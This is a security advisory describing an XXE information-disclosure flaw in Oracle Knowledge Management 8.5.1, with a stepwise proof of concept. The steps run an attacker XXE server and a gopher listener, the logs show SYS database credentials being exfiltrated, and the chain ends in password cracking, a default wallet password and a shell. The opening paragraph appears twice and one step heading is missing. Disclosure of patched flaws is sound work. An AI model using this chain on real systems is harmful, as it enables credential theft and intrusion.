### Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle’s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content. Oracle’s products for knowledge management help users find useful knowledge contained in corporate information stores. ### Credit An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ### Vendor response Oracle has released patches to address this vulnerability, for more details see: http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html. ### Vulnerability Details The vulnerable code can be found in /imws/Result.jsp which when calls, can be used to access an XML from a...
### Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle’s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content. Oracle’s products for knowledge management help users find useful knowledge contained in corporate information stores. ### Credit An independent security researcher, Steven Seeley, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program. ### Vendor response Oracle has released patches to address this vulnerability, for more details see: http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html. ### Vulnerability Details The vulnerable code can be found in /imws/Result.jsp which when calls, can be used to access an XML from a third-party server, this third-party server which can be under our control can be used to reference files locally present on the victim’s server. ### Proof of Concept To exploit the vulnerability, we will run the following 5 steps (the first 2 need to be run in the background): - ‘Malicious’ XML External Entity (XXE) server - Listener for the gopher protocol - Attacker who steal the ‘custom.xml’ file - Decrypt/crack the encrypted AES password - Shell on the machine This image illustrates the steps this attack requires and the sequence of events that happen (behind the scenes):  Step 1 – setup a ‘malicious’ XML External Entity (XXE) server: ``` x@pluto:~/xxe$ ruby xxeserve.rb -o 0.0.0.0 [2015-02-09 16:03:45] INFO WEBrick 1.3.1 [2015-02-09 16:03:45] INFO ruby 1.9.3 (2013-11-22) [x86_64-linux] == Sinatra/1.4.5 has taken the stage on 4567 for development with backup from WEBrick [2015-02-09 16:03:45] INFO WEBrick::HTTPServer#start: pid=18862 port=4567 172.16.77.128 - - [09/Feb/2015:16:04:10 +1100] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173 0.0089 172.16.77.128 - - [09/Feb/2015:16:04:10 AEDT] "GET /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml HTTP/1.1" 200 173 - -> /xml?f=C:/Oracle/Knowledge/IM/instances/InfoManager/custom.xml ``` Step 2 – setup a listener for the gopher protocol: ``` x@pluto:~/xxe$ ./gopher.py starting up on 0.0.0.0 port 1337 waiting for a connection connection from ('172.16.77.128', 50746) (+) The database SID is: jdbc:oracle:thin:@WIN-U94QE7O15KE:1521:IM (+) The database username is: SYS as SYSDBA (+) The database password is: VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4= ``` ``` x@pluto:~/xxe$ ./poc.py (+) pulling custom.xml for the db password... (!) Success! please check the gopher.py window! ``` Step 4 – decrypt/crack the encrypted AES password: ```` NOTE: you will need to bruteforce the encryption key which is contained in the wallet. Oracle Knowledge uses 'OracleKnowledge1' as the wallet/keystore password, but you will most likely not have the wallet or keystore in which case a dictionary attack is to be used to find the password. x@pluto:~/xxe$ ./decrypt.sh VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4= (+) Decrypting... "VO4+OdJq+LXTkmSdXgvCg37TdK9mKftuz2XFiM9mif4=" Result: "password" ``` Step 5 – get a shell Using the database information, login to the database remotely and execute code. You may also find another configuration file on the system that will allow you a more ‘direct’ way to obtain a SYSTEM shell.
